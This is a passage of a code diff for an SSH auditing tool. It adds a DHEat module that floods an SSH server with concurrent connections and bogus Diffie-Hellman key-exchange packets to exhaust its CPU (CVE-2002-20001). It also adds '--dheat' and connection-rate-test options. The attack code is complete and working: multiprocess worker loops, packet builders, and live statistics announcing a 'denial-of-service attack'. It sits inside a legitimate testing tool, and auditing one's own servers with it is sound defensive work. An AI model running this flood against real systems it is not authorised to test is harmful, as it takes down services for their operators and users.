%u." % (server_gex_alg, accepted_bits)) + ssh_socket.close() + return accepted_bits + else: + self.debug("get_largest_gex_modulus(%s): received smaller bits (%u) than requested (9216 - 16384); continuing..." % (server_gex_alg, accepted_bits)) + + # Check the largest bit sizes first, and stop the moment we find something the server supports. + for bits in [8192, 7680, 6144, 4096, 3072, 2048, 1024]: + ret.clear() + if GEXTest.granular_modulus_size_test(self.out, ssh_socket, new_kex, bits, bits, bits, ret) == exitcodes.GOOD and server_gex_alg in ret: + + # Check that what the server accepted lies within the range we requested. + accepted_bits = ret[server_gex_alg][0] + if accepted_bits == bits: + self.debug("get_largest_gex_modulus(%s) returning %u." % (server_gex_alg, accepted_bits)) + ssh_socket.close() + return accepted_bits + self.debug("get_largest_gex_modulus(%s): received smaller bits (%u) than requested (%u); continuing..." % (server_gex_alg, accepted_bits, bits)) + + # Our standard bit sizes failed above, so let's try a range from 1024 - 8192 as a last attempt... + ret.clear() + if GEXTest.granular_modulus_size_test(self.out, ssh_socket, new_kex, 1024, 4096, 8192, ret) == exitcodes.GOOD and server_gex_alg in ret: + accepted_bits = ret[server_gex_alg][0] + self.debug("get_largest_gex_modulus(%s) returning %u." % (server_gex_alg, accepted_bits)) + ssh_socket.close() + return accepted_bits + + # Total failure. :( + return 0 + + + def get_padding(self, payload: bytes) -> Tuple[int, bytes]: + '''Given a payload, returns the padding length and the padding.''' + + pad_len = -(len(payload) + 5) % 8 + if pad_len < 4: + pad_len += 8 + padding = b"\x00" * pad_len + + return pad_len, padding + + + def make_dh_kexinit(self, chosen_alg: str, gex_msb: int = -1) -> bytes: + '''Makes a Diffie-Hellman Key Exchange Init packet. Instead of calculating a real value for e, a random value less than p - 1 is constructed.''' + + # Start with a zero-byte to signify that this is not a negative number. The second byte must be 0xfe or smaller so as to ensure that our value of e < p - 1 (otherwise the server will reject it). All bytes thereafter can be random. + + message_code = b'\x1e' # Diffie-Hellman Key Exchange Init (30) + max_msb = 254 # The most significant byte for KEX must be between 0x00 and 0xFE (inclusive). + if gex_msb != -1: + message_code = b'\x20' # Diffie-Hellman Group Exchange Init (32) + max_msb = gex_msb - 1 # During the GEX negotiation, the server returned a custom p value. Subtracting by 1 ensures e < p - 1. + + if chosen_alg == "ecdh-sha2-nistp256": + e = DHEat.HARDCODED_NISTP256 + elif chosen_alg == "ecdh-sha2-nistp384": + e = DHEat.HARDCODED_NISTP384 + elif chosen_alg == "ecdh-sha2-nistp521": + e = DHEat.HARDCODED_NISTP521 + else: + e = b"\x00" + int.to_bytes(random.randint(0, max_msb), length=1, byteorder="big") + os.urandom(self.e_rand_len) + + payload = message_code + struct.pack("!L", len(e)) + e + pad_len, padding = self.get_padding(payload) + + return struct.pack("!LB", len(payload) + pad_len + 1, pad_len) + payload + padding + + + def make_gex_request(self, gex_modulus_size: int) -> bytes: + '''Creates a Diffie-Hellman Group Exchange Request packet.''' + + # Message code = 0x22 = Diffie-Hellman Group Exchange Request (34). + payload = b'\x22' + struct.pack("!LLL", gex_modulus_size, gex_modulus_size, gex_modulus_size) + pad_len, padding = self.get_padding(payload) + + return struct.pack("!LB", len(payload) + pad_len + 1, pad_len) + payload + padding + + + def make_kexinit(self) -> bytes: + '''Creates a complete Key Exchange Init packet, which contains the kex algorithm we're targeting, host keys & ciphers we support, etc. The algorithms we claim to support is really the list that the server gave to us in order to guarantee that it will accept our message.''' + + # Message code = 0x14 = Key Exchange Init (20). + payload = b'\x14' + os.urandom(16) + self.kex_init_body + pad_len, padding = self.get_padding(payload) + + return struct.pack("!LB", len(payload) + pad_len + 1, pad_len) + payload + padding + + + def output(self, s: str = "") -> None: + self.out.info(s) + + + def read_banner(self, s: socket.socket) -> Tuple[bytes, bytes]: + '''Returns the server's banner. Optionally returns extra bytes that came after the banner.''' + + read_buffer = b'' + newline_pos = -1 + timer = time.time() + while newline_pos == -1: + if (time.time() - timer) >= self.read_timeout: + return b'', b'' + + buf = b'' + try: + buf = s.recv(32) + except ConnectionResetError: + return b'', b'' + except socket.timeout: + return b'', b'' + + if len(buf) == 0: + return b'', b'' + + read_buffer += buf + newline_pos = read_buffer.find(b"\r\n") + + extra = b'' + if len(read_buffer) > newline_pos + 2: + extra = read_buffer[newline_pos + 2:] + + return read_buffer[0:newline_pos], extra + + + def read_ssh_packet(self, s: socket.socket, extra: bytes = b'') -> Tuple[int, int]: + '''Reads an SSH packet and returns its message code. When Diffie-Hellman Key Exchange Reply (31) packets are read, the most-significant byte of the GEX p-value is also returned.''' + + extra_len = len(extra) + buf = b'' + if extra_len < 5: + # self.debug("Obtaining lengths by reading %u bytes." % (5 - extra_len)) + buf = s.recv(5 - extra_len) + if len(buf) == 0: + return -1, -1 + + buf = extra + buf + extra = b'' + extra_len = 0 + else: + buf = extra[0:5] + extra = extra[5:] + extra_len = len(extra) + + # self.debug("Unpacking lengths: %s" % buf) + packet_len, padding_len = struct.unpack("!LB", buf) # pylint: disable=unused-variable + # self.debug("Packet len: %u; padding len: %u" % (packet_len, padding_len)) + + packet_len -= 1 + buf = extra + s.recv(packet_len - extra_len) + if buf == b"": + return -1, -1 + + message_code = buf[0] + + # If this is a Diffie-Hellman Key Exchange Reply (31), then obtain the most-significant byte of the p-value returned. + gex_msb = -1 + if message_code == 31 and len(buf) > 6: + gex_msb = buf[5] if buf[5] != 0 else buf[6] + + return message_code, gex_msb + + + def run(self) -> None: + '''Main entrypoint for testing the server.''' + + + self.start_timer = time.time() + + # Run against the server until the user presses CTRL-C, then dump statistics. + success = True + try: + success = self._run() + except KeyboardInterrupt: + pass + + # Don't print statistics if it failed to run. + if not success: + return + + # Print extensive statistics on what just happened. + seconds_running = time.time() - self.start_timer + print("\n\n") + print(" %s %sSTATISTICS%s %s" % (self.BAR_CHART, self.WHITEB, self.CLEAR, self.CHART_UPWARDS)) + print(" %s----------%s" % (self.WHITEB, self.CLEAR)) + print() + print(" Run time: %s%.1f seconds%s" % (self.WHITEB, seconds_running, self.CLEAR)) + print() + print(" Attempted TCP connections: %s%.1f/sec, %u total%s" % (self.WHITEB, self.num_attempted_tcp_connections / seconds_running, self.num_attempted_tcp_connections, self.CLEAR)) + print(" Successful TCP connections: %s%.1f/sec, %u total%s" % (self.WHITEB, self.num_successful_tcp_connections / seconds_running, self.num_successful_tcp_connections, self.CLEAR)) + print() + print(" Bytes written: %s%s/sec, %s total%s" % (self.WHITEB, DHEat.add_byte_units(self.num_bytes_written / seconds_running), DHEat.add_byte_units(self.num_bytes_written), self.CLEAR)) + print() + print(" Successful DH KEX replies: %s%.1f/sec, %u total%s" % (self.WHITEB, self.num_successful_dh_kex / seconds_running, self.num_successful_dh_kex, self.CLEAR)) + print(" Unexpected DH KEX replies: %s%.1f/sec, %u total%s" % (self.WHITEB, self.num_failed_dh_kex / seconds_running, self.num_failed_dh_kex, self.CLEAR)) + print() + print("OpenSSH-throttled connections: %s%.1f/sec, %u total%s" % (self.WHITEB, self.num_openssh_throttled_connections / seconds_running, self.num_openssh_throttled_connections, self.CLEAR)) + print(" Connection timeouts: %s%.1f/sec, %u total%s (timeout setting: %.1f sec)" % (self.WHITEB, self.num_connect_timeouts / seconds_running, self.num_connect_timeouts, self.CLEAR, self.connect_timeout)) + print(" Read timeouts: %s%.1f/sec, %u total%s (timeout setting: %.1f sec)" % (self.WHITEB, self.num_read_timeouts / seconds_running, self.num_read_timeouts, self.CLEAR, self.read_timeout)) + print(" Socket exceptions: %s%.1f/sec, %u total%s" % (self.WHITEB, self.num_socket_exceptions / seconds_running, self.num_socket_exceptions, self.CLEAR)) + print() + print() + + if seconds_running < 3.0: + print("Total run time was under 3 seconds; try running it for longer to get more accurate analysis.") + elif self.num_successful_tcp_connections / seconds_running < DHEat.MAX_SAFE_RATE: + print("Because the number of successful TCP connections per second (%.1f) is less than %.1f, it appears that the target is using rate limiting to prevent CPU exaustion." % (self.num_successful_tcp_connections / seconds_running, DHEat.MAX_SAFE_RATE)) + else: + print("Because the number of successful TCP connections per second (%.1f) is greater than %.1f, it appears that the target is %sNOT%s using rate limiting to prevent CPU exaustion." % (self.num_successful_tcp_connections / seconds_running, DHEat.MAX_SAFE_RATE, DHEat.REDB, DHEat.CLEAR)) + + print() + + + def _run(self) -> bool: + '''Where all the magic happens.''' + + + self.output() + self.output("Running DHEat test against %s[%s]:%u%s with %s%u%s concurrent sockets..." % (self.WHITEB, self.target, self.port, self.CLEAR, self.WHITEB, self.concurrent_connections, self.CLEAR)) + + # If the user didn't specify an exact kex algorithm to test, check our prioritized list against what the server supports. Larger p-values (such as group18: 8192-bits) cause the most strain on the server. + chosen_alg = "" + gex_modulus_size = -1 + if self.target_kex == "": + + # Look through the server's kex list and see if any are GEX algorithms. To save time, we will only check the first GEX we encounter, instead of all of them (I assume the results will be the same anyway). + server_gex_alg = "" + for server_kex in self.kex.kex_algorithms: + if server_kex in DHEat.gex_algs: + server_gex_alg = server_kex + break + + # If the server supports at least one gex algorithm, find the largest modulus it supports. Store an entry in the alg_modulus_sizes so we remember this for later. + if server_gex_alg != "": + # self.output("Analyzing server's group exchange algorithm, %s, to find largest modulus it supports..." % (server_gex_alg)) + gex_modulus_size = self.analyze_gex(server_gex_alg) + # self.output("The largest modulus supported by %s appears to be %u." % (server_gex_alg, largest_bit_modulus)) + + # Now choose the KEX/GEX with the largest modulus that is supported by the server. + chosen_alg = "" + for alg in DHEat.alg_priority: + if alg in self.kex.kex_algorithms: + chosen_alg = alg + break + + # If the server's kex options don't intersect with our prioritized algorithm list, then we cannot run this test. + if chosen_alg == "": + self.out.fail("Error: server's key exchange algorithms do not match with any algorithms implemented by this client!") + self.out.warn("Server's key exchanges: \n * %s" % ("\n * ".join(self.kex.kex_algorithms))) + self.out.warn("Client's key exchanges: \n * %s" % ("\n * ".join(DHEat.alg_priority))) + return False + + self.debug("Chose [%s] from prioritized list: [%s]" % (chosen_alg, ", ".join(DHEat.alg_priority))) + + else: # The user specified an exact algorithm to test. + + # If the user chose an algorithm we don't have an implementation for... + if (self.target_kex not in DHEat.alg_priority) and (self.target_kex not in DHEat.gex_algs): + self.out.fail("Specified target key exchange [%s] is not in list of implemented algorithms: [%s]." % (self.target_kex, ", ".join(DHEat.alg_priority))) + return False + + # Ensure that what the user chose is supported by the server. + if self.target_kex not in self.kex.kex_algorithms: + self.out.fail("Specified target key exchange [%s] is not supported by the server: [%s]." % (self.target_kex, ", ".join(self.kex.kex_algorithms))) + return False + + # If this is a GEX, find the largest modulus it supports. + if self.target_kex in DHEat.gex_algs: + gex_modulus_size = self.analyze_gex(self.target_kex) + + chosen_alg = self.target_kex + + self.output("Targeting server algorithm: %s%s%s (modulus size: %u)" % (self.WHITEB, chosen_alg, self.CLEAR, DHEat.alg_modulus_sizes[chosen_alg])) + + if self.user_set_e_len and chosen_alg not in self.HARDCODED_ALGS: + self.output("Using user-supplied e length: %u" % (self.e_rand_len)) + if chosen_alg in self.COMPLEX_PQ_ALGS: + self.output("{:s}NOTE:{:s} short e lengths can work against the post-quantum algorithm targeted, but the current implementation of this attack results in protocol errors; the number of successful DH KEX replies will be reported as zero even though the CPU will still be exhausted.".format(self.YELLOWB, self.CLEAR)) + elif self.user_set_e_len and chosen_alg in self.HARDCODED_ALGS: + self.output("{:s}NOTE:{:s} ignoring user-supplied e length, since the targeted algorithm (a NIST P-curve) must use hard-coded e values.".format(self.YELLOWB, self.CLEAR)) + + # If an untested DH alg is chosen, ask the user to e-mail the maintainer/create a GitHub issue to report success. + if chosen_alg not in DHEat.tested_algs: + self.output() + self.output(DHEat.untested_alg_notice.format(color_start=self.YELLOWB, color_end=self.CLEAR, dh_alg=chosen_alg)) + + self.output() + self.output("Commencing denial-of-service attack. Validate results by monitoring target's CPU idle status.") + self.output() + self.output("Press CTRL-C to stop attack and see statistics.") + self.output() + + self.generate_kex(chosen_alg) + + # If the user didn't already choose the e length, calculate the length of the random bytes we need to generate the value e that we'll send to the server. + if not self.user_set_e_len: + self.e_rand_len = int(DHEat.alg_modulus_sizes[chosen_alg] / 8) - 1 + # self.debug("Setting e_rand_len to %u." % self.e_rand_len) + + # Create all the processes. + multiprocessing.set_start_method("spawn") + q: Any = multiprocessing.Queue() + for _ in range(0, self.concurrent_connections): + p = multiprocessing.Process(target=self.worker_process, args=(q, chosen_alg, gex_modulus_size,)) + p.start() + + spinner = ["-", "\\", "|", "/"] + spinner_index = 0 + + # Read the statistics from the child processes, and update the UI once per second. + last_update = time.time() + while True: + + try: + # Ensure an upper bound of 5 seconds without updating the UI. + for _ in range(0, 5): + thread_statistics = q.get(True, 1.0) # Block for up to 1 second. + self.num_attempted_tcp_connections += thread_statistics['num_attempted_tcp_connections'] + self.num_successful_tcp_connections += thread_statistics['num_successful_tcp_connections'] + self.num_successful_dh_kex += thread_statistics['num_successful_dh_kex'] + self.num_failed_dh_kex += thread_statistics['num_failed_dh_kex'] + self.num_bytes_written += thread_statistics['num_bytes_written'] + self.num_connect_timeouts += thread_statistics['num_connect_timeouts'] + self.num_read_timeouts += thread_statistics['num_read_timeouts'] + self.num_socket_exceptions += thread_statistics['num_socket_exceptions'] + self.num_openssh_throttled_connections += thread_statistics['num_openssh_throttled_connections'] + except queue.Empty: # If Queue.get() timeout exceeded. + pass + + now = time.time() + if (now - last_update) >= 1.0: + seconds_running = now - self.start_timer + print("%s%s%s TCP SYNs/sec: %s%u%s; Compl. conns/sec: %s%u%s; Bytes sent/sec: %s%s%s; DH kex/sec: %s%u%s \r" % (self.WHITEB, spinner[spinner_index], self.CLEAR, self.BLUEB, self.num_attempted_tcp_connections / seconds_running, self.CLEAR, self.BLUEB, self.num_successful_tcp_connections / seconds_running, self.CLEAR, self.BLUEB, DHEat.add_byte_units(self.num_bytes_written / seconds_running), self.CLEAR, self.PURPLEB, self.num_successful_dh_kex / seconds_running, self.CLEAR), end="") + last_update = now + spinner_index = (spinner_index + 1) % 4 + + + def worker_process(self, q: Any, chosen_alg: str, gex_modulus_size: int) -> None: + '''Worker process that floods the target.''' + + # Handle CTRL-C gracefully. + try: + self._worker_process(q, chosen_alg, gex_modulus_size) + except KeyboardInterrupt: + pass + + + def _worker_process(self, q: Any, chosen_alg: str, gex_modulus_size: int) -> None: + '''Worker process that floods the target.''' + + + def _close_socket(s: socket.socket) -> None: + try: + s.shutdown(socket.SHUT_RDWR) + s.close() + except OSError: + pass + + + # Copy variables from the object (which might exist in another process?). This might cut down on inter-process overhead. + connect_timeout = self.connect_timeout + target = self.target + port = self.port + + # Determine if we are attacking with a GEX. + gex_mode = False + if chosen_alg in DHEat.gex_algs: + gex_mode = True + self.debug("Setting GEX mode to True; gex_modulus_size: %u" % gex_modulus_size) + + # Attack statistics local to this process. + num_attempted_tcp_connections = 0 + num_successful_tcp_connections = 0 + num_successful_dh_kex = 0 + num_failed_dh_kex = 0 + num_bytes_written = 0 + num_connect_timeouts = 0 + num_read_timeouts = 0 + num_socket_exceptions = 0 + num_openssh_throttled_connections = 0 + + num_loops_since_last_statistics_sync = 0 + while True: + num_loops_since_last_statistics_sync += 1 + + # Instead of flooding the parent process with statistics, report our stats only every 5 connections. + if num_loops_since_last_statistics_sync > 5: + num_loops_since_last_statistics_sync = 0 + + q.put({ + 'num_attempted_tcp_connections': num_attempted_tcp_connections, + 'num_successful_tcp_connections': num_successful_tcp_connections, + 'num_successful_dh_kex': num_successful_dh_kex, + 'num_failed_dh_kex': num_failed_dh_kex, + 'num_bytes_written': num_bytes_written, + 'num_connect_timeouts': num_connect_timeouts, + 'num_read_timeouts': num_read_timeouts, + 'num_socket_exceptions': num_socket_exceptions, + 'num_openssh_throttled_connections': num_openssh_throttled_connections, + }) + + # Since we sent our statistics, reset them all back to zero. + num_attempted_tcp_connections = 0 + num_successful_tcp_connections = 0 + num_successful_dh_kex = 0 + num_failed_dh_kex = 0 + num_bytes_written = 0 + num_connect_timeouts = 0 + num_read_timeouts = 0 + num_socket_exceptions = 0 + num_openssh_throttled_connections = 0 + + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.settimeout(connect_timeout) + + # Loop until a successful TCP connection is made. + connected = False + while not connected: + + # self.debug("Connecting to %s:%d" % (self.target, self.port)) + try: + num_attempted_tcp_connections += 1 + s.connect((target, port)) + connected = True + except OSError as e: + self.debug("Failed to connect: %s" % str(e)) + + # Send everything all at once. This isn't technically valid to do, but SSH implementations seem to be fine with it. + bytes_to_write = b"" + if gex_mode: + bytes_to_write = self.banner + self.make_kexinit() + self.make_gex_request(gex_modulus_size) + else: + bytes_to_write = self.banner + self.make_kexinit() + self.make_dh_kexinit(chosen_alg) + + try: + s.sendall(bytes_to_write) + num_bytes_written += len(bytes_to_write) + except (ConnectionResetError, BrokenPipeError): + num_socket_exceptions += 1 + except socket.timeout: + num_connect_timeouts += 1 + + banner, extra = self.read_banner(s) + if banner == b'': + self.debug("Blank banner received.") + _close_socket(s) + num_socket_exceptions += 1 + continue + + # If we receive a valid SSH banner from the server, we'll count it as a successful connection. Note that OpenSSH returns "Exceeded MaxStartups" when throttling occurs (due to the MaxStartups setting). + if banner.startswith(b"SSH-2.0-") or banner.startswith(b"SSH-1"): + num_successful_tcp_connections += 1 + elif banner == b'Exceeded MaxStartups': + num_openssh_throttled_connections += 1 + _close_socket(s) + continue + else: + self.debug("Invalid banner received: %r" % banner) + _close_socket(s) + continue + + # Read the KEXINIT from the server. + message_code = -1 + try: + message_code, _ = self.read_ssh_packet(s, extra=extra) + # self.debug("Message code: %u" % message_code) + except (ConnectionResetError, socket.timeout) as e: + num_failed_dh_kex += 1 + num_socket_exceptions += 1 + _close_socket(s) + self.debug("Exception in read_ssh_packet: %s" % str(e)) + continue + + # Ensure that we received Key Exchange Init (20). + if message_code != 20: + num_failed_dh_kex += 1 + _close_socket(s) + self.debug("Expected Kex Exchange Init (20), received: %u" % message_code) + continue + + # Read the Diffie-Hellman Key Exchange Init from the server. + message_code = -1 + try: + message_code, gex_msb = self.read_ssh_packet(s) + # self.debug("Message code: %u" % message_code) + except (ConnectionResetError, socket.timeout) as e: + num_failed_dh_kex += 1 + num_socket_exceptions += 1 + _close_socket(s) + self.debug("Exception in read_ssh_packet: %s" % str(e)) + continue + + # If we get message code 31, then we know the server properly handled our Diffie-Hellman Key Exchange Init, and thus, wasted its time. + if message_code == 31: + + if not gex_mode: + num_successful_dh_kex += 1 + + # If we're targeting a GEX, we need to send and receive another set of packets. + else: + # Send the Diffie-Hellman Group Exchange Init (32). + bytes_to_write = self.make_dh_kexinit(chosen_alg, gex_msb=gex_msb) + try: + s.sendall(bytes_to_write) + num_bytes_written += len(bytes_to_write) + except (ConnectionResetError, BrokenPipeError): + num_socket_exceptions += 1 + except socket.timeout: + num_connect_timeouts += 1 + + try: + message_code, _ = self.read_ssh_packet(s) + except (ConnectionResetError, socket.timeout) as e: + num_failed_dh_kex += 1 + num_socket_exceptions += 1 + _close_socket(s) + self.debug("Exception in read_ssh_packet: %s" % str(e)) + continue + + # If we received Diffie-Hellman Group Exchange Reply (33), then we know the server properly handled our Diffie-Hellman Group Exchange Init (32), and thus, wasted its time. + if message_code == 33: + num_successful_dh_kex += 1 + else: + num_failed_dh_kex += 1 + + else: + num_failed_dh_kex += 1 + + _close_socket(s) diff --git a/src/ssh_audit/ssh_audit.py b/src/ssh_audit/ssh_audit.py index ac50287..4fff3ae 100755 --- a/src/ssh_audit/ssh_audit.py +++ b/src/ssh_audit/ssh_audit.py @@ -27,6 +27,7 @@ import concurrent.futures import copy import getopt import json +import multiprocessing import os import re import sys @@ -44,6 +45,7 @@ from ssh_audit.algorithm import Algorithm from ssh_audit.algorithms import Algorithms from ssh_audit.auditconf import AuditConf from ssh_audit.banner import Banner +from ssh_audit.dheat import DHEat from ssh_audit import exitcodes from ssh_audit.fingerprint import Fingerprint from ssh_audit.gextest import GEXTest @@ -96,7 +98,22 @@ def usage(uout: OutputBuffer, err: Optional[str] = None) -> None: uout.info(' -6, --ipv6 enable IPv6 (order of precedence)') uout.info(' -b, --batch batch output') uout.info(' -c, --client-audit starts a server on port 2222 to audit client\n software config (use -p to change port;\n use -t to change timeout)') + uout.info(' --conn-rate-test=N[:max_rate] perform a connection rate test (useful') + uout.info(' for collecting metrics related to') + uout.info(' susceptibility of the DHEat vuln).') + uout.info(' Testing is conducted with N concurrent') + uout.info(' sockets with an optional maximum rate') + uout.info(' of connections per second.') uout.info(' -d, --debug debug output') + uout.info(' --dheat=N[:kex[:e_len]] continuously perform the DHEat DoS attack') + uout.info(' (CVE-2002-20001) against the target using N') + uout.info(' concurrent sockets. Optionally, a specific') + uout.info(' key exchange algorithm can be specified') + uout.info(' instead of allowing it to be automatically') + uout.info(' chosen. Additionally, a small length of') + uout.info(' the fake e value sent to the server can') + uout.info(' be chosen for a more efficient attack (such') + uout.info(' as 4).') uout.info(' -g, --gex-test= dh gex modulus size test') uout.info(' ') uout.info(' ') @@ -111,6 +128,7 @@ def usage(uout: OutputBuffer, err: Optional[str] = None) -> None: uout.info(' environment variable is set)') uout.info(' -p, --port= port to connect') uout.info(' -P, --policy= run a policy test using the specified policy') + uout.info(' --skip-rate-test skip the connection rate test during standard audits\n (used to safely infer whether the DHEat attack\n is viable)') uout.info(' -t, --timeout= timeout (in seconds) for connection and reading\n (default: 5)') uout.info(' -T, --targets= a file containing a list of target hosts (one\n per line, format HOST[:PORT]). Use --threads\n to control concurrent scans.') uout.info(' --threads= number of threads to use when scanning multiple\n targets (-T/--targets) (default: 32)') @@ -430,7 +448,7 @@ def output_recommendations(out: OutputBuffer, algs: Algorithms, algorithm_recomm # Output additional information & notes. -def output_info(out: OutputBuffer, software: Optional['Software'], client_audit: bool, any_problems: bool, is_json_output: bool, additional_notes: str) -> None: +def output_info(out: OutputBuffer, software: Optional['Software'], client_audit: bool, any_problems: bool, is_json_output: bool, additional_notes: List[str]) -> None: with out: # Tell user that PuTTY cannot be hardened at the protocol-level. if client_audit and (software is not None) and (software.product == Product.PuTTY): @@ -441,8 +459,9 @@ def output_info(out: OutputBuffer, software: Optional['Software'], client_audit: out.warn('(nfo) For hardening guides on common OSes, please see: ') # Add any additional notes. - if len(additional_notes) > 0: - out.warn("(nfo) %s" % additional_notes) + for additional_note in additional_notes: + if len(additional_note) > 0: + out.warn("(nfo) %s" % additional_note) if not out.is_section_empty() and not is_json_output: out.head('# additional info') @@ -450,8 +469,8 @@ def output_info(out: OutputBuffer, software: Optional['Software'], client_audit: out.sep() -def post_process_findings(banner: Optional[Banner], algs: Algorithms, client_audit: bool) -> Tuple[List[str], str]: - '''Perform post-processing on scan results before reporting them to the user. Returns a list of algorithms that should not be recommended''' +def post_process_findings(banner: Optional[Banner], algs: Algorithms, client_audit: bool, dh_rate_test_notes: str) -> Tuple[List[str], List[str]]: + '''Perform post-processing on scan results before reporting them to the user. Returns a list of algorithms that should not be recommended and a list of notes.''' def _add_terrapin_warning(db: Dict[str, Dict[str, List[List[Optional[str]]]]], category: str, algorithm_name: str) -> None: '''Adds a warning regarding the Terrapin vulnerability for the specified algorithm.''' @@ -590,20 +609,24 @@ def post_process_findings(banner: Optional[Banner], algs: Algorithms, client_aud _add_terrapin_warning(db, "mac", mac) # Return a note telling the user that, while this target is properly configured, if connected to a vulnerable peer, then a vulnerable connection is still possible. - notes = "" + additional_notes = [] if len(algs_to_note) > 0: - notes = "Be aware that, while this target properly supports the strict key exchange method (via the kex-strict-?-v00@openssh.com marker) needed to protect against the Terrapin vulnerability (CVE-2023-48795), all peers must also support this feature as well, otherwise the vulnerability will still be present. The following algorithms would allow an unpatched peer to create vulnerable SSH channels with this target: %s. If any CBC ciphers are in this list, you may remove them while leaving the *-etm@openssh.com MACs in place; these MACs are fine while paired with non-CBC cipher types." % ", ".join(algs_to_note) + additional_notes.append("Be aware that, while this target properly supports the strict key exchange method (via the kex-strict-?-v00@openssh.com marker) needed to protect against the Terrapin vulnerability (CVE-2023-48795), all peers must also support this feature as well, otherwise the vulnerability will still be present. The following algorithms would allow an unpatched peer to create vulnerable SSH channels with this target: %s. If any CBC ciphers are in this list, you may remove them while leaving the *-etm@openssh.com MACs in place; these MACs are fine while paired with non-CBC cipher types." % ", ".join(algs_to_note)) # Add the chacha ciphers, CBC ciphers, and ETM MACs to the recommendation suppression list if they are not enabled on the server. That way they are not recommended to the user to enable if they were explicitly disabled to handle the Terrapin vulnerability. However, they can still be recommended for disabling. algorithm_recommendation_suppress_list += _get_chacha_ciphers_not_enabled(db, algs) algorithm_recommendation_suppress_list += _get_cbc_ciphers_not_enabled(db, algs) algorithm_recommendation_suppress_list += _get_etm_macs_not_enabled(db, algs) - return algorithm_recommendation_suppress_list, notes + # Append any notes related to the DH rate test. + if len(dh_rate_test_notes) > 0: + additional_notes.append(dh_rate_test_notes) + + return algorithm_recommendation_suppress_list, additional_notes # Returns a exitcodes.* flag to denote if any failures or warnings were encountered. -def output(out: OutputBuffer, aconf: AuditConf, banner: Optional[Banner], header: List[str], client_host: Optional[str] = None, kex: Optional[SSH2_Kex] = None, pkm: Optional[SSH1_PublicKeyMessage] = None, print_target: bool = False) -> int: +def output(out: OutputBuffer, aconf: AuditConf, banner: Optional[Banner], header: List[str], client_host: Optional[str] = None, kex: Optional[SSH2_Kex] = None, pkm: Optional[SSH1_PublicKeyMessage] = None, print_target: bool = False, dh_rate_test_notes: str = "") -> int: program_retval = exitcodes.GOOD client_audit = client_host is not None # If set, this is a client audit. @@ -611,7 +634,7 @@ def output(out: OutputBuffer, aconf: AuditConf, banner: Optional[Banner], header algs = Algorithms(pkm, kex) # Perform post-processing on the findings to make final adjustments before outputting the results. - algorithm_recommendation_suppress_list, additional_notes = post_process_findings(banner, algs, client_audit) + algorithm_recommendation_suppress_list, additional_notes = post_process_findings(banner, algs, client_audit, dh_rate_test_notes) with out: if print_target: @@ -868,7 +891,7 @@ def process_commandline(out: OutputBuffer, args: List[str], usage_cb: Callable[. try: sopts = 'h1246M:p:P:jbcnvl:t:T:Lmdg:' - lopts = ['help', 'ssh1', 'ssh2', 'ipv4', 'ipv6', 'make-policy=', 'port=', 'policy=', 'json', 'batch', 'client-audit', 'no-colors', 'verbose', 'level=', 'timeout=', 'targets=', 'list-policies', 'lookup=', 'threads=', 'manual', 'debug', 'gex-test='] + lopts = ['help', 'ssh1', 'ssh2', 'ipv4', 'ipv6', 'make-policy=', 'port=', 'policy=', 'json', 'batch', 'client-audit', 'no-colors', 'verbose', 'level=', 'timeout=', 'targets=', 'list-policies', 'lookup=', 'threads=', 'manual', 'debug', 'gex-test=', 'dheat=', 'skip-rate-test', 'conn-rate-test='] opts, args = getopt.gnu_getopt(args, sopts, lopts) except getopt.GetoptError as err: usage_cb(out, str(err)) @@ -956,6 +979,12 @@ def process_commandline(out: OutputBuffer, args: List[str], usage_cb: Callable[. usage_cb(out, '{} {} {} is not valid'.format(o, bits_left_bound, bits_right_bound)) aconf.gex_test = a + elif o == '--dheat': + aconf.dheat = a + elif o == '--skip-rate-test': + aconf.skip_rate_test = True + elif o == '--conn-rate-test': + aconf.conn_rate_test = a if len(args) == 0 and aconf.client_audit is False and aconf.target_file is None and aconf.list_policies is False and aconf.lookup == '' and aconf.manual is False: @@ -1039,7 +1068,7 @@ def process_commandline(out: OutputBuffer, args: List[str], usage_cb: Callable[. return aconf -def build_struct(target_host: str, banner: Optional['Banner'], cves: List[Dict[str, Union[str, float]]], kex: Optional['SSH2_Kex'] = None, pkm: Optional['SSH1_PublicKeyMessage'] = None, client_host: Optional[str] = None, software: Optional[Software] = None, algorithms: Optional[Algorithms] = None, algorithm_recommendation_suppress_list: Optional[List[str]] = None, additional_notes: str = "") -> Any: # pylint: disable=too-many-arguments +def build_struct(target_host: str, banner: Optional['Banner'], cves: List[Dict[str, Union[str, float]]], kex: Optional['SSH2_Kex'] = None, pkm: Optional['SSH1_PublicKeyMessage'] = None, client_host: Optional[str] = None, software: Optional[Software] = None, algorithms: Optional[Algorithms] = None, algorithm_recommendation_suppress_list: Optional[List[str]] = None, additional_notes: List[str] = []) -> Any: # pylint: disable=dangerous-default-value def fetch_notes(algorithm: str, alg_type: str) -> Dict[str, List[Optional[str]]]: '''Returns a dictionary containing the messages in the "fail", "warn", and "info" levels for this algorithm.''' @@ -1207,8 +1236,8 @@ def build_struct(target_host: str, banner: Optional['Banner'], cves: List[Dict[s # Add in the recommendations. res['recommendations'] = get_algorithm_recommendations(algorithms, algorithm_recommendation_suppress_list, software, for_server=True) - # Add in the additional notes. Currently just one string, but in the future this may grow to multiple strings. Hence, an array is needed to prevent future schema breakage. - res['additional_notes'] = [additional_notes] + # Add in the additional notes. + res['additional_notes'] = additional_notes return res @@ -1290,6 +1319,14 @@ def audit(out: OutputBuffer, aconf: AuditConf, sshv: Optional[int] = None, print out.fail("Failed to parse server's kex. Stack trace:\n%s" % str(traceback.format_exc())) return exitcodes.CONNECTION_ERROR + if aconf.dheat is not None: + DHEat(out, aconf, banner, kex).run() + return exitcodes.GOOD + elif aconf.conn_rate_test_enabled: + DHEat.dh_rate_test(out, aconf, kex, 0, 0, 0) + return exitcodes.GOOD + + dh_rate_test_notes = "" if aconf.client_audit is False: HostKeyTest.run(out, s, kex) if aconf.gex_test != '': @@ -1297,9 +1334,16 @@ def audit(out: OutputBuffer, aconf: AuditConf, sshv: Optional[int] = None, print else: GEXTest.run(out, s, banner, kex) + # Skip the rate test if the user specified "--skip-rate-test". + if aconf.skip_rate_test: + out.d("Skipping rate test due to --skip-rate-test option.") + else: + # Try to open many TCP connections against the server if any Diffie-Hellman key exchanges are present; this tests potential vulnerability to the DHEat DOS attack. Use 3 concurrent sockets over at most 1.5 seconds to open at most 38 connections (stops if 1.5 seconds elapse, or 38 connections are opened--whichever comes first). If more than 25 connections per second were observed, flag the DH algorithms with a warning about the DHEat DOS vuln. + dh_rate_test_notes = 